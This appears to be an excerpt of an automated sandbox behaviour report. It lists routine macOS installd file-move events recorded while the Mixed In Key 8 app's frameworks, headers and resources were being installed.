Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_SVBWfL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizer_SubclassMethods.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Ikc5pY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPlayer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5SYMJ3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent_SubclassMethods.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pVV4kK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIErrors.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_uCxgKv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIUtilities.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_qqX1bF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOnCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ywXQbP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemMessageCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pEIkBX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTimeSignatureEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_xotspx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/NSUIApplication+MIKMIDI.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_I4humc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingGenerator.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cYRDEO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClientDestinationEndpoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Q4V1Tr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPolyphonicKeyPressureEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_KGs4aE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingManager.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Azgy5u -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_tz4zWZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOffCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_8q00es -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDI.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_w7CuRX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IaxYFg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDevice.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_7Qhm3f -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPort.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_eGlTwG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappableResponder.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5x8gP9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITrack.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_1em8ii -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaMarkerTextEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_G8iJoN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpointSynthesizer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MKgOxN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelVoiceCommand.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_YW0fEw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISourceEndpoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_nSheHQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClientSourceEndpoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/.BC.T_0nscRx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/module.modulemap	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_u2pNQj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftQuartzCore.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/.BC.T_IcrRhJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/.BC.T_bvP0py -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/MIKAnalysis	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/.BC.T_WqVdky -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/MIKVolumeAnalysis.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/.BC.T_i6SYnI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/.BC.T_VZmGFw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_EG9v8h -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeats.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_GCwiu2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKEnergyAnalyzer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_KEyeyh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAudioSpectrum.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_VoGwZt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyAnalyzer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_3sY5yl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisSegment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_01k060 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysis.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_TWgNY1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyTable.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_zZReG9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKNewKeyAnalyzer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_3DRnON -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKWaveformAnalyzer.h	Jump to behavior
